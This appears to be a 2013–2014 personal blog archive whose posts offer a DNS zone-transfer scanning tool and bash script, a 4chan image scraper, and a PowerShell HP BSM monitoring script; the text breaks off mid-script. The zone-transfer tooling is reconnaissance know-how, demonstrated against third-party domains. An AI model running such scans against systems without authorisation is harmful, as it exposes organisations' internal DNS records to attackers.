Wednesday, April 9, 2014

Blog has been moved

Hey.

I'm moving to another site with my blog. Please go to http://wondershell.wordpress.com/ for newest posts.

Cheers.

Tuesday, April 8, 2014

Mèdved - web-based dns zone transfer automation

Entry moved here: http://wondershell.wordpress.com/2014/04/09/medved-web-based-dns-zone-transfer-automation/



It's been a while since my last post, so today i have something bigger and - most probably - more usefull than usually. [Download link on the bottom]

I present to you Mèdved (name means bear in serbian language). It is a part of the suite of tools i'm creating thus the main directory is named carnivores.
This is a web-based tool designed to automate the search for domain transfers. It has an intuitive interface and few helpful shortcuts. As an input it expects a domain or list of domains. Ideally the list should be comma-separated but it will handle space or CR-LF separated lists as well. Aside from normal results it gives you a log of performed searches and all successful transfers are archived.

Requirements:
Linux + Apache2
path to medved.php: /var/www/carnivores/medved/medved.php (simply extract the archive to /var/www/)

There are some requirements for directory structure and permissions so i show you how the tree should look like:





Below is the first page with help toggled.




It has been implemented with responsive design so you can use it on your smartphone/tablet although the interface becomes slightly denser:




You can supply the list as domain.com, domain2.com, domain3.com.
If you have a list looking like this: domain.com domain2.com domain3.com
or like this:

domain.com 
domain2.com 
domain3.com

you can paste it as well, just use the button Spaces to commas, before clicking Analyze button, and the list will be corrected to expected form. If you have an URL list instead of domains - use the button Sanitize URLs and it should strip all the unnecessary stuff from the URL. 

This and more about the available functions and shortcuts is described in the help.

Lets see how it works with example:




As you can see the transfer for Microsoft is actively refused. All tested NS servers have separate tabs. The warning sign shown for other domain (which i removed from the picture) indicates that server do not accept TCP connections. The OK sign for one of the servers indicates successful transfer.

It is common to frequently test the same domain after some time, to see if new records have been added or if the server configuration has been corrected. That is why all the successful transfers are saved in the archive. An archive is a simple list of available transfer results. 






You can filter the results to show the particular domain only, by clicking on a domain name. The list shows the date of the transfer, records discovered and the link to review the transfer data. If more than one server responded with transfer data for particular domain, the number of records shown will be the sum from all the servers.
This might give you a false idea that you might get 1000 records in the transfer when in fact you received 500 records but from two servers.

If you need unique records just save the file and use the command 

cat records.txt | sort -u

I'm not going to post any code in here as it would be really tedious work. Instead you can download all of it using the link below.

Download from here.

As usual i'm not responsible for how you use this tool. This is presented only as a proof of concept. You can use it but you cannot distribute it without my knowledge and explicit consent.

I've used a code snippet from http://blog.stevenlevithan.com/archives/parseuri for URL parsing and shortcut.js file from http://www.openjs.com/scripts/events/keyboard_shortcuts/ for creating shortcuts.

Friday, August 23, 2013

DNS zone transfer script

Entry moved here: http://wondershell.wordpress.com/2014/04/09/dns-zone-transfer-script/

Script automating discovery of name servers allowing zone transfers.
Nothing fancy. Just to make it easier.

The output:

The zone transfer:



#!/bin/bash

domains="$1"
data="";

for dnsserver in $(host -t ns "$domains" | cut -d " " -f 4);
do
        # VARIABLES
        str_len=$(echo "$dnsserver" | tr -d " " | wc -c)
        str_len=$(echo "$str_len-2"| bc )
        dns_server=$(echo "$dnsserver" | cut -b "-$str_len")
        zone_data=$(dig axfr "$1" "@$dns_server")

        # CHECKING ZONE TRANSFER
        check=$(echo "$zone_data" | grep "Transfer failed" | wc -l)

        if [[ $check -ne 0 ]];
        then
                echo -e " Transfer \033[31mFAILURE\033[00m at $dns_server"
        else
                echo -e " Transfer \033[32mSUCCESS\033[00m at $dns_server"

                # REMEMBER LAST SUCCESSFUL
                data="$zone_data";
                server="$dns_server"
        fi

done

echo ""
echo " Use command: dig axfr $1 @$server"

# UNCOMMENT THIS IF YOU WANT ZONE DATA OUTPUT
# echo "$data"

Wednesday, August 21, 2013

4chan board /hr image downloader (image download manager)

Entry moved here: http://wondershell.wordpress.com/2014/04/09/4chan-board-hr-image-downloader/

Two decades ago, browsing the internet via 56kb modem was an agonizing experience when you've encountered the webpage rich with pictures. They had to be compressed and of course the compression was lossy.
Now you can download high-resolution pictures with a click of a button and wait only couple of seconds for them to be fully loaded. Bandwidth is not an issue anymore. 
What IS the issue? Where to get the really high-resolution pictures (above 1920x1080) on a specific and very narrow topic.
If you like (as do I) old medieval maps, NASA best space pictures, landscape photos  or some old paintings that are hard to find in high-resolution and you will not feel offended with an occasional nudity - then the /hr board at 4chan.com is the place just for you. In there you will find multiple collections of really amazing pictures compiled in a single threads just waiting for you to grab them. Yes - this is 4chan. Famous for being lightly moderated and for postings that are anonymous - as warned before, you might encounter some nudity but i guess this is a price for a top-notch pictures you would have otherwise never found.

The /hr board is a collection of multiple threads containing postings with pictures. While i really like some of them, I'm not a patient person when it comes to the downloading stuff manually by clicking on each and every one of them. Therefore, I've created a bash script that will download all the pictures for me automatically. It is fairly easy and it works in a three phases  firstly it collects all the links to threads, secondly it parses those threads and isolates the links to images and finally it downloads those images to the directory specified.


While it is capable of downloading at full speed, I've limited the parsing of webpages to 10000Bps and downloading the images to 200kbps with curl and wget respectively.

I think it's a matter of netiquette not to cause an overload for the 4chan servers.

Take a peek at how it looks when executed:
1. Collecting links to sub-pages

2. Collecting links to images

3. Downloading images

Functions' definitions are in separate file below.

Without further ado, here it is:


dwm.sh
#!/bin/bash

 source myfunctions.sh

 ############################
 #        VARIABLES         #
 ############################

 today=`date +%d.%m.%y`
 time=`date +%H:%M:%S`
 cols=$(tput cols)
 lines=$(tput lines)
 download_counter=0;
 curltransfer="100000B"

 margin_offset=0;
 margin_text_offset=2;

 let top_box_t=0;
 let top_box_b=0+5;
 let top_box_l=0+$margin_offset;
 let top_box_r=$cols-$margin_offset;
 let top_box_width=$cols-$margin_offset-$margin_offset

 site="http://boards.4chan.org/hr/"

 if [[ ! -d "./$today" ]]; then  mkdir ./$today; fi

 tput civis
 clear



 draw_top_box;
 draw_bottom_box;
 scrap_links;

 cat links.4chan | sort -u >> uniquelinks.4chan
 if [[ -e links.4chan ]]; then rm links.4chan; fi
 cat uniquelinks.4chan | grep -v "board" | cut -d "#" -f 1 > tmp.4chan
 rm uniquelinks.4chan
 cat tmp.4chan | sort -u >> uniquelinks.4chan
 rm tmp.4chan

 scrap_images;

 cat images.4chan | sort -u >> uniqueimages.4chan
 rm images.4chan

 draw_panel;
 draw_headers;

 download_images;

 tput cup 20 0;

 tput cnorm
Functions are in separate file.
myfunctions.sh
#!/bin/bash

check_image()
{
        echo "1:" $1
        echo "2:" $2
}

draw_headers()
{
        tput cup $(($top_box_t+2)) $(($top_box_l+2));
        echo -en "$EINS\033[1;30m\033[40m#\033[0m";
        tput cup $(($top_box_t+2)) $(($top_box_l+6));
        echo -en "$EINS\033[1;30m\033[40mFILE NAME\033[0m";
}

download_images()
{

        let scroll_lines=$lines-6
        top=4

        tput cup $top 0
        scrolled_lines=1;
        allfiles=`cat uniqueimages.4chan | wc -l`

        index=0

        for i in `cat uniqueimages.4chan`
        do

                filename=`echo $i | cut -d "/" -f 6`
                if [[ $((index%$scroll_lines)) -eq 0 ]];
                then
                        tput cup $top 0
                        for ((j=0; j<$scroll_lines; j++))
                        do
                                echo -e "$EINS\033[32m\033[40m                                                                          \033[0m";
                        done
                        tput cup $top 0
                fi

                echo -ne "\033[s"

#               if [[ $index -gt 999 ]];
#               then
#                       tput cup $top 0
#                        for ((j=0; j<$scroll_lines; j++))
#                        do
#                                echo -e "$EINS\033[32m\033[40m                                                                          \033[0m";
#                        done
#                        tput cup $top 0
#                       let index=1
#                       echo -e "   $index  $EINS\033[30m\033[47mhttp:$i\033[0m"
#               fi
                if [[ $index -lt 10 ]];
                then
                        echo -e "   $index  $EINS\033[30m\033[47mhttp:$i\033[0m"
                elif [[ $index -lt 100 && $index -gt 9 ]];
                then
                        echo -e "  $index  $EINS\033[30m\033[47mhttp:$i\033[0m"
                elif [[ $index -lt 1000 && $index -gt 99 ]];
                then
                        echo -e " $index  $EINS\033[30m\033[47mhttp:$i\033[0m"
                elif [[ $index -gt 999 ]];
                then
                        tput cup $top 0
                        for ((j=0; j<$scroll_lines; j++))
                        do
                                echo -e "$EINS\033[32m\033[40m                                                                          \033[0m";
                        done
                        tput cup $top 0
                        echo -ne "\033[s"
                        let index=1
                        echo -e "   $index  $EINS\033[30m\033[47mhttp:$i\033[0m"
                fi

                #DOWNLOADING HERE
                color=1
                size=0
                download_check=`cat ./4chan_download.log | grep $filename | wc -l`
                if [[ $download_check -eq 0 ]];
                then
                        let color=1
                        wget -q --limit-rate=200k -P ./$today http:$i
                        size=`ls -hls 24.09.12/$filename | cut -d " " -f 6`
                        #ls -hls 24.09.12/$filename | cut -d " " -f 5
                        let download_counter=$download_counter+1
                else
                        let color=2
                fi

                echo -ne "\033[u"
                if [[ $index -lt 10 ]];
                then
                        echo -en "   $index  $EINS\033[m\033[40mhttp:$i\033[0m"
                        if [[ $color -eq 1 ]];
                        then
                                echo -e  "\t[$EINS\033[32m\033[40m+\033[0m]"
                        else
                                echo -e  "\t[$EINS\033[33m\033[40m*\033[0m]"
                        fi
                elif [[ $index -lt 100 && $index -gt 9 ]];
                then
                        echo -en "  $index  $EINS\033[m\033[40mhttp:$i\033[0m"
                        if [[ $color -eq 1 ]];
                        then
                                echo -e  "\t[$EINS\033[32m\033[40m+\033[0m]"
                        else
                                echo -e  "\t[$EINS\033[33m\033[40m*\033[0m]"
                        fi
                elif [[ $index -lt 1000 && $index -gt 99 ]];
                then
                        echo -en " $index  $EINS\033[m\033[40mhttp:$i\033[0m"
                        if [[ $color -eq 1 ]];
                        then
                                echo -e  "\t[$EINS\033[32m\033[40m+\033[0m]"
                        else
                                echo -e  "\t[$EINS\033[33m\033[40m*\033[0m]"
                        fi
                fi

                let index=$index+1

                echo -ne "\033[s";
                #draw_bottom_box;
                tput cup $top_box_t $(($top_box_l+20));
                echo -en "$EINS\033[30m\033[47mDOWNLOADED $download_counter/$allfiles\033[0m";
                echo -ne "\033[u";
        done
}

scrap_images()
{
 tput cup $(($top_box_t+5)) $(($top_box_l+1));
 echo -en "$EINS\033[1;30m\033[40mSCRAPING IMAGES\033[0m";
 tput cup $(($top_box_t+5)) $(($top_box_l+20));
 echo -en "$EINS\033[1;30m\033[40m[\033[0m";
 tput cup $(($top_box_t+5)) $(($top_box_l+36));
 echo -en "$EINS\033[1;30m\033[40m]\033[0m";

 urls=`cat uniquelinks.4chan | wc -l`
 index=0;

 position=21
 for i in `cat uniquelinks.4chan`;
 do

        let index=$index+1
        tput cup $top_box_t $(($top_box_l+20));
        echo -en "$EINS\033[30m\033[47mSCRAPED $index/$urls\033[0m";

        #HERE GOES THE CODE FOR images/# SCRAPPING
        let left=$position
        tput cup $(($top_box_t+5)) $(($top_box_l+$left));
        echo -en "$EINS\033[1;30m\033[40m-\033[0m";

        curl -s --limit-rate 10000B http://boards.4chan.org/hr/$i | grep -o '<a .*href=.*>' | sed -e 's/<a /\n<a /g' |  sed -e 's/<a .*href=['"'"'"]//' -e 's/["'"'"'].*$//' -e  '/^$/ d' | grep "images" | uniq >> images.4chan

        let position=$position+1
        if [[ $position -eq 36 ]];
        then
                tput cup $(($top_box_t+5)) $(($top_box_l+36));
                echo -en "$EINS\033[1;30m\033[40m]\033[0m";
                let position=21;
                tput cup $(($top_box_t+5)) $((1+$position));
                echo -en "$EINS\033[1;30m\033[40m              \033[0m";
        fi

 done

#CLEAN PROGRESS BAR
 for i in {1..14};
 do
        let left=$((19+$i))
        tput cup $(($top_box_t+5)) $(($top_box_l+$left));
        echo -en "$EINS\033[1;30m\033[40m \033[0m";
 done

#MARK AS COMPLETE
 tput cup $(($top_box_t+5)) $(($top_box_l+20+14));
 echo -en "$EINS\033[1;30m\033[40m[\033[0m";
 echo -en "$EINS\033[32m\033[40m+\033[0m";
 echo -en "$EINS\033[1;30m\033[40m]\033[0m";

#CLEAN COUNTER
 tput cup $top_box_t $(($top_box_l+20));
 echo -en "$EINS\033[30m\033[47m                                \033[0m";

}

scrap_links()
{
 if [[ -e links.4chan ]];
 then
        rm links.4chan;
 fi
 tput cup $(($top_box_t+4)) $(($top_box_l+1));
 echo -en "$EINS\033[1;30m\033[40mSCRAPING LINKS\033[0m";
 tput cup $(($top_box_t+4)) $(($top_box_l+20));
 echo -en "$EINS\033[1;30m\033[40m[\033[0m";
 tput cup $(($top_box_t+4)) $(($top_box_l+36));
 echo -en "$EINS\033[1;30m\033[40m]\033[0m";

#CLEAN OUTPUT FILE
        if [[ -e links.4chan ]]; then rm links.4chan; fi

#SCRAP THE FIST PAGE
 curl -s  --limit-rate $curltransfer http://boards.4chan.org/hr/ | grep -o '<a .*href=.*>' | sed -e 's/<a /\n<a /g' |  sed -e 's/<a .*href=['"'"'"]//' -e 's/["'"'"'].*$//' -e '/^$/ d' | grep "res/" | sort -u >> links.4chan

#SCRAP REST
 for i in {1..15};
 do
        let left=$((20+$i))
        tput cup $(($top_box_t+4)) $(($top_box_l+$left));
        echo -en "$EINS\033[1;30m\033[40m-\033[0m";
        curl -s  --limit-rate $curltransfer http://boards.4chan.org/hr/$i | grep -o '<a .*href=.*>' | sed -e 's/<a /\n<a /g' |  sed -e 's/<a .*href=['"'"'"]//' -e 's/["'"'"'].*$//' -e '/^$/ d' | grep "res/" | sort -u  >> links.4chan
 done

#CLEAN PROGRESS BAR
 for i in {1..14};
 do
        let left=$((19+$i))
        tput cup $(($top_box_t+4)) $(($top_box_l+$left));
        echo -en "$EINS\033[1;30m\033[40m \033[0m";
 done

#MARK AS COMPLETE
 tput cup $(($top_box_t+4)) $(($top_box_l+20+14));
 echo -en "$EINS\033[1;30m\033[40m[\033[0m";
 echo -en "$EINS\033[32m\033[40m+\033[0m";
 echo -en "$EINS\033[1;30m\033[40m]\033[0m";
}


function draw_top_box()
{
 for (( i=0; i<$top_box_width; i++ ))
 do
        let left=$top_box_l+$i;
        tput cup $top_box_t $left;
        echo -en "$EINS\033[30m\033[47m \033[0m";
 done


 tput cup $top_box_t $(($top_box_l+2));
 echo -en "$EINS\033[30m\033[47mDWM v.1.0\033[0m";
 tput cup $top_box_t $(($cols-20));
 echo -en "$EINS\033[30m\033[47m$time | $today\033[0m";

 tput cup $lines $cups;

}

function draw_bottom_box()
{
 tput cup $lines $cups;
 for (( i=0; i<$top_box_width; i++ ))
 do
        let left=$top_box_l+$i;
        tput cup $cols $left;
        echo -en "$EINS\033[30m\033[47m \033[0m";
 done

 tput cup $lines $cups;
 echo -en "$EINS\033[30m\033[47m  DOWNLOADED FILES: $download_counter\033[0m";
}

function draw_panel()
{
 for (( i=0; i<$top_box_width; i++ ))
 do
        let left=$top_box_l+$i;
        tput cup $(($top_box_t+1)) $left;
        echo -en "$EINS\033[1;30m\033[40m-\033[0m";
 done

 for (( i=0; i<$top_box_width; i++ ))
 do
        let left=$top_box_l+$i;
        tput cup $(($top_box_t+3)) $left;
        echo -en "$EINS\033[1;30m\033[40m-\033[0m";
 done

 tput cup $(($top_box_t+2)) $top_box_l;
 echo -en "$EINS\033[1;30m\033[40m|\033[0m";
 tput cup $(($top_box_t+2)) $top_box_r;
 echo -en "$EINS\033[1;30m\033[40m|\033[0m";
 tput cup $(($top_box_t+2)) $(($top_box_l+4));
 echo -en "$EINS\033[1;30m\033[40m|\033[0m";

 tput cup $(($top_box_t+1)) $top_box_l;
 echo -en "$EINS\033[1;30m\033[40m+\033[0m";
 tput cup $(($top_box_t+1)) $top_box_r;
 echo -en "$EINS\033[1;30m\033[40m+\033[0m";

 tput cup $(($top_box_t+3)) $top_box_l;
 echo -en "$EINS\033[1;30m\033[40m+\033[0m";
 tput cup $(($top_box_t+3)) $top_box_r;
 echo -en "$EINS\033[1;30m\033[40m+\033[0m";

 tput cup $(($top_box_t+3)) $(($top_box_l+4));
 echo -en "$EINS\033[1;30m\033[40m+\033[0m";

 tput cup $(($top_box_t+1)) $(($top_box_l+4));
 echo -en "$EINS\033[1;30m\033[40m+\033[0m";

 tput cup $(($top_box_t+1)) $(($top_box_r-5));
 echo -en "$EINS\033[1;30m\033[40m+\033[0m";

 tput cup $(($top_box_t+3)) $(($top_box_r-5));
 echo -en "$EINS\033[1;30m\033[40m+\033[0m";

 tput cup $(($top_box_t+2)) $(($top_box_r-5));
 echo -en "$EINS\033[1;30m\033[40m|\033[0m";

}



Be aware that all scripts are run at your own risk and while every script has been written with the intention of minimising the potential for unintended consequences, the owners, hosting providers and contributers cannot be held responsible for any misuse or script problems.

Sunday, May 12, 2013

HP BSM / HP BAC Business Process Monitor maintenance automation with powershell


For those of You that work with application performance monitoring or synthetic user experience monitoring the name of HP Business Availability Center (BAC - formerly known as Mercury Topaz) or HP Business Service Management (BSM - as it is called nowadays), might sound somewhat familiar. One of the features that this suite includes is Business Process Monitor (sometimes referred to as probe). BPM is a piece of software that is capable of running recorded scripts, the execution of which is measured and reported back to central side server - BAC/BSM. This allows you to diagnose and narrow down the cause of performance drops, network bottlenecks or availability issues both overall and from the specific BPM.

To make it more clear:
Lets say you have an application that is available to your clients all over the world. You need to sustain an availability and performance on a level specified in the SLA. You buy BAC/BSM licence and install Business Process Monitor within your clients' network infrastructures. This will allow you to track performance of your application from multiple sites (cross-country or across the world). Scripts are commonly recorded with HP LoadRunner and deployed to BPMs and executed. The data reported  by Business Process Monitor to central server can show you how long did it take to access your application from specific location, how long did it take for your server to respond, how much time did the SSL handshake consumed, what were the errors encountered during the script execution and what errors did the end user saw when your application had issues. Overall a really, really great tool.

But... at some point when number of Your applications increases and with those the number of BPMs and sustained transactions as well (transaction is a block of code within the script that contains particular actions - for example authentication process, or data submit to web page - and is shown separately on the server side), You will face imminent problem with tracking how much BPMs still work, how much have been shutdown accidentally (or intentionally) by your client or which transactions are missing data and when did they stop reporting. The job of reviewing all of the BPMs scattered across multiple transactions, and multiple applications, and multiple profiles (profile is a group of application or group of scripts) is a tedious and painfully boring. I had to review hundreds of transactions and hundreds of BPMs each month - trust me, there are better ways of spending half day at work. Daily routine kills the joy in you piece by piece.

Once, I had enough. I've decided to automate this process. 
The purpose: to know when particular Business Process Monitor stopped responding and to know how long particular transaction/script hasn't been executed or returned data.
The weapon of choice: powershell + BSM OpenAPI.

The example output (as usual sensitive data has been removed). The report is for last three months. BPMs that failed more than two months ago are in magenta, more then month ago - in red, more than week in yellow.













Notice that you have to supply Your own username and password in the URLs in the script.

The variable $strict set to 1 forces the script to report the Business Process Monitor as faulty only when it stopped responding in all scripts/transactions that has been deployed to it. If it is set to 0, the script will report the Business Process Monitor as faulty even it if stopped executing only one of deployed scripts/transactions. 
Both modes are useful in some cases.

Script:
#############################
# BPMs / PROBES MAINTANACE

# VARIABLES
 $storageDir = "D:\Work\tmp"
 $strict = 1;
 # DATES IN SECONDS
 $now = [int][double]::Parse((Get-Date -UFormat %s))
 $weekAgo = [int]($now - (60*60*24*7))
 $monthAgo = [int] ($now - (60*60*24*30))
 $threeMonthsAgo = [int] ($now - (60*60*24*90))
 $origin = New-Object -Type DateTime -ArgumentList 1970, 1, 1, 0, 0, 0, 0
 
 # NUMBER OF MONTHS - HOW FAR AGO TO REACH FOR DATA [ SHOULD BE EITHER 1 OR 3 ]
 $numberOfMonths = 3
 
 # TRANSACTIONS ARRAY
 $faultyT = New-Object object[] 150
 $faultyTIndex = 0;
 
 # PROFILES TABLE
 $faultyP = New-Object object[] 6
 $faultyPIndex = 0;
 
 # PROBES TABLE
 $faultyPr = New-Object object[] 150
 $faultyPrIndex = 0;
 
 # EFFECTIVELY FOUR DIMENTIONAL ARRAY OF 
 # PROFILES -> TRANSACTIONS -> PROBES -> [PROBE NAME][TIMESTAMP]
 $profileProbes = New-Object object[] 6
 
 # THREE DIMENTIONAL ARRAY OF 
 # PROFILES -> TRANSACTIONS -> [TRANSACTON NAME][TIMESTAMP]
 $profiles = New-Object object[] 6
 
 # MANUALLY FILLED ARRAY OF PROFILE NAMES
 $profilesNames = New-Object object[] 6
 $profilesNames[0] = "A" 
 $profilesNames[1] = "B"
 $profilesNames[2] = "C"  
 $profilesNames[3] = "D"
 $profilesNames[4] = "E"
 $profilesNames[5] = "F" 

 
# FUNCTIONS
function downloadTransactions( [string]$profile )
{
  $webclient = New-Object System.Net.WebClient
  $url = "https://BAC.URL/gdeopenapi/GdeOpenApi?method=getData&user=XXX&password=XXX&query=SELECT DISTINCT szTransactionName as transaction, MAX(time_stamp) as time FROM trans_t WHERE profile_name='" + $profile + "' and time_stamp>" + $weekAgo + " &resultType=csv&customerID=1"
  $file = "$storageDir\" + $profile + ".csv"
  $webclient.DownloadFile($url,$file)
}
 
function downloadProbes( [string]$transaction )
{
  $webclient = New-Object System.Net.WebClient
  $url = "https://BAC.URL/gdeopenapi/GdeOpenApi?method=getData&user=XXX&password=XXX&query=SELECT DISTINCT szLocationName as probe, MAX(time_stamp) as time FROM trans_t WHERE szTransactionName='" + $transaction + "' and time_stamp>" + $monthAgo + " &resultType=csv&customerID=1"
  $file = "$storageDir\" + $transaction + ".csv"
  $webclient.DownloadFile($url,$file)
}
 
function downloadProbesQuaterly( [string]$transaction )
{
  $webclient = New-Object System.Net.WebClient
  $url = "https://BAC.URL/gdeopenapi/GdeOpenApi?method=getData&user=XXX&password=XXX&query=SELECT DISTINCT szLocationName as probe, MAX(time_stamp) as time FROM trans_t WHERE szTransactionName='" + $transaction + "' and time_stamp>" + $threeMonthsAgo + " &resultType=csv&customerID=1"
  $file = "$storageDir\" + $transaction + ".csv"
  $webclient.DownloadFile($url,$file)
}
 
function showFaultyProfiles()
{
  for ($i = 0; $i -lt $faultyP.Length; $i++)
  {
    if ( $faultyP[$i].Length -gt 1 )
    {
      Write-host "`t" $faultyP[$i]
    }
  }
}
 
function showFaultyTransactions()
{
 Write-host -foregroundcolor green "+---------------------+-----//------+";
 Write-host -foregroundcolor green "|  HOURS WITHOUT DATA | TRANSACTION |";
 Write-host -foregroundcolor green "+---------------------+-----//------+";
 for ($i = 0; $i -lt $faultyT.Length; $i++)
 {
   for ($j = 0; $j -lt $faultyT[$i].Length; $j=$j+2)
  {
   $size = 55;
   $tranName = [string]$faultyT[$i][$j]
   $spaces = [int]([int]$size - [int]$tranName.Length)
   for ($k = 0; $k -lt $spaces; $k++)
   {
    $tranName = " " + $tranName;
    }
   $size = 18;
   $tranTime = [string]$faultyT[$i][$j+1]
   $spaces = [int]([int]$size - [int]$tranTime.Length)
   for ($k = 0; $k -lt $spaces; $k++)
   {
    $tranTime = " " + $tranTime;
   }
   Write-host -foregroundcolor green "| " $tranTime "|"  $tranName "|"
   Write-host -foregroundcolor green "+---------------------+-----//----+";
   }
 }
}

function printRow ( [string]$dateString, [string]$diffString, 
   [string]$probeString, [string]$transactionString,  [string]$color ) 
{
  Write-host -nonewline -foregroundcolor green "| " 
  Write-host -nonewline -foregroundcolor $color $dateString
  Write-host -nonewline -foregroundcolor green " | "
  Write-host -nonewline -foregroundcolor $color $diffString
  Write-host -nonewline -foregroundcolor green " | "
  Write-host -nonewline -foregroundcolor $color $probeString
  Write-host -nonewline -foregroundcolor green " | "
  Write-host -nonewline -foregroundcolor $color $transactionString
  Write-host -foregroundcolor green " |" 
}

function drawLine()
{
  Write-host -foregroundcolor green "+--//--+--//--+--//--+--//--+";
}
function drawHeader()
{
  Write-host -foregroundcolor green "+--//--+--//--+--//--+--//--+";
  Write-host -foregroundcolor green "| LAST SEEN | HOURS LOST | PROBE | LAST TRANSACTION |";
  Write-host -foregroundcolor green "+--//--+--//--+--//--+--//--+";
}
 
# PROFILES 

Write-Host -nonewline -foregroundcolor green " COLLECTING PROFILE TRANSACTIONS `t-"
$progress = "-"
for ($i = 0; $i -lt $profilesNames.Length; $i++)
{ 
  downloadTransactions ([string]$profilesNames[$i])
  $file = $storageDir + "\" + $profilesNames[$i] + ".csv"
  $tmp = Import-Csv "$file" -header("transaction","time","o")
  $counter = 0;
  $tmp | ForEach-Object 
      { 
        if ( $_.transaction -ne "transaction" -and
          $_.transaction -ne "" )
        { $counter++ } 
      }
  $transactions = New-Object object[] $counter
  $j = 0;
  $tmp | ForEach-Object {
    if ( $_.transaction -ne "transaction" -and 
          $_.transaction -ne "" -and 
          $_.transaction -ne "The data is empty" )
    { 
         $time = [int][double]::Parse(($_.time));
      $pair = New-Object object[] 2
      $pair[0] = $_.transaction;
      $pair[1] = $time
      $transactions[$j] = $pair
      $j++ 
    }
  }
  $profiles[$i] = $transactions
  if ($progress -eq "-") {Write-host -nonewline "`b\" ; $progress = "\"; continue}
  if ($progress -eq "\") {Write-host -nonewline "`b|"; $progress = "|";continue}
  if ($progress -eq "|") {Write-host -nonewline "`b/"; $progress = "/";continue}
  if ($progress -eq "/") {Write-host -nonewline "`b-"; $progress = "-";continue}
}
Write-host -foregroundcolor green "`b`b`tV"
Write-host -nonewline -foregroundcolor green " COLLECTING TRANSACTIONS' TIMESTAMPS `t-"
 
for ($i = 0; $i -lt $profiles.Length; $i++)
{
 for ($j = 0; $j -lt $profiles[$i].Length; $j++)
 {
   $diff = 0;
   if ( $profiles[$i][$j].Length -gt 0 ) 
   {
    # CALCULATE TIME SINCE LAST RESPONSE
    $diff = $now - [int][double]::Parse(($profiles[$i][$j][1]));
    
    # PARSE TO HOURS
    $diff = $diff / 60 / 60;
    
    # ROUNDING
    $diff = [int]$diff;
    
    if ( $diff -gt 25 )
    {
     $transaction = New-Object object[] 2
     $transaction[0] = $profiles[$i][$j][0];
     $transaction[1] = $diff;
     $faultyT[$faultyTIndex] = $transaction;
     $faultyTIndex++;
    }
   }
   else 
   { 
     $faultyP[$faultyPIndex] = $profilesNames[$i];
     $faultyPIndex++;
   }
   if ($progress -eq "-") {Write-host -nonewline "`b\" ; $progress = "\"; continue}
   if ($progress -eq "\") {Write-host -nonewline "`b|"; $progress = "|";continue}
   if ($progress -eq "|") {Write-host -nonewline "`b/"; $progress = "/";continue}
   if ($progress -eq "/") {Write-host -nonewline "`b-"; $progress = "-";continue}
 }
}

Write-host -foregroundcolor green "`b`b`tV"


Write-host -nonewline -foregroundcolor green " COLLECTING PROBES' TIMESTAMPS `t`t-"

for ($i = 0; $i -lt $profiles.Length; $i++)
{
  $transactionProbes = New-Object object[] 200
  for ($j = 0; $j -lt $profiles[$i].Length; $j++)
  {
   if ( $profiles[$i][$j] )
   {
    $transaction = $profiles[$i][$j][0].Replace('&', '%26')
    $transaction = $transaction.Replace('+', '%2B')
    if ( $numberOfMonths -eq 3 )
    {
     downloadProbesQuaterly ($transaction)
    }
    else
    {
     downloadProbes ($transaction)
    }
  
    $file = $storageDir + "\" + $transaction + ".csv"
    $tmp = Import-Csv "$file" -header("probe","time","o")
    $counter = 0;
    $tmp | ForEach-Object 
         { 
           if ( $_.probe -ne "probe" -and $_.probe -ne "" )
           { $counter++; } 
         }
    $probes = New-Object object[] $counter
    $k = 0;
    $tmp | ForEach-Object 
    { 
     if ( $_.probe -ne "probe" -and 
               $_.probe -ne "" -and 
               $_.probe -ne "The data is empty" )
     {
       $time = [int][double]::Parse(($_.time));
       $probe = New-Object object[] 2
       $probe[0] = $_.probe;
       $probe[1] = $time
       $probes[$k] = $probe
       $k++ 
     } 
    }
    $transactionProbes[$j] = $probes; 
   }
    if ($progress -eq "-") {Write-host -nonewline "`b\" ; $progress = "\"; continue}
    if ($progress -eq "\") {Write-host -nonewline "`b|"; $progress = "|";continue}
    if ($progress -eq "|") {Write-host -nonewline "`b/"; $progress = "/";continue}
    if ($progress -eq "/") {Write-host -nonewline "`b-"; $progress = "-";continue}
  }
  $profileProbes[$i] = $transactionProbes;
}

Write-host -foregroundcolor green "`b`b`tV"

Write-host -nonewline -foregroundcolor green " SANITAZING PROBES' TIMESTAMPS `t`t-"

for ($i = 0; $i -lt $profileProbes.Length; $i++)
{
  for ($j = 0; $j -lt $profileProbes[$i].Length; $j++)
  {
    $validation = 0;
     for ($b = 0; $b -lt $faultyT.Length; $b++)
     {
      if ($faultyT[$b])
      {
       if ($profiles[$i][$j])
       {
        if ( $faultyT[$b][0] -eq $profiles[$i][$j][0] )
        {
          $validation = 1
        }
       }
      }
     }
  
    if ($validation -eq 0)
    {
      for ($k = 0; $k -lt $profileProbes[$i][$j].Length; $k++)
      {
    $diff = $now - [int][double]::Parse(($profileProbes[$i][$j][$k][1]))
    $diff = $diff / 60 / 60;
    $diff = [int]$diff;
   
    if ($diff -gt 25)
    {
       $containCheck = 0;
      for ($a = 0; $a -lt $faultyPr.Length; $a++)
      {
     if ( $faultyPr[$a] ) 
     {
      if ( $faultyPr[$a][0] -eq $profileProbes[$i][$j][$k][0] )
      {
       $containCheck = 1;
       if ( $faultyPr[$a][1] -lt $profileProbes[$i][$j][$k][1] )
       {
         $faultyPr[$a][1] = $profileProbes[$i][$j][$k][1]
         $faultyPr[$a][2] = $profiles[$i][$j][0]
       }
       }
      }
    }
    if ( $containCheck -eq 0 )
    {
      $probe = New-Object object[] 3
      $probe[0] = $profileProbes[$i][$j][$k][0]
      $probe[1] = $profileProbes[$i][$j][$k][1]
      $probe[2] = $profiles[$i][$j][0]
      $faultyPr[$faultyPrIndex] = $probe
      $faultyPrIndex++;
    }
   }
  }
  }
  }
  if ($progress -eq "-") {Write-host -nonewline "`b\" ; $progress = "\"; continue}
  if ($progress -eq "\") {Write-host -nonewline "`b|"; $progress = "|";continue}
  if ($progress -eq "|") {Write-host -nonewline "`b/"; $progress = "/";continue}
  if ($progress -eq "/") {Write-host -nonewline "`b-"; $progress = "-";continue}
}
 
if ($strict -eq 1) 
{
  for ( $a = 0; $a -lt $faultyPr.Length; $a++ )
  {
    if ($faultyPr[$a])
    {
    for ($i = 0; $i -lt $profileProbes.Length; $i++)
     {
     for ($j = 0; $j -lt $profileProbes[$i].Length; $j++)
      {
      for ($k = 0; $k -lt $profileProbes[$i][$j].Length; $k++)
      {
        if ( ($profileProbes[$i][$j][$k]) -and ($faultyPr[$a]) )
        {
         if ( $faultyPr[$a][0] -eq $profileProbes[$i][$j][$k][0] )
         {
          if ( $faultyPr[$a][1] -lt $profileProbes[$i][$j][$k][1] )
         {
          $diff = $now - [int][double]::Parse(($profileProbes[$i][$j][$k][1]))
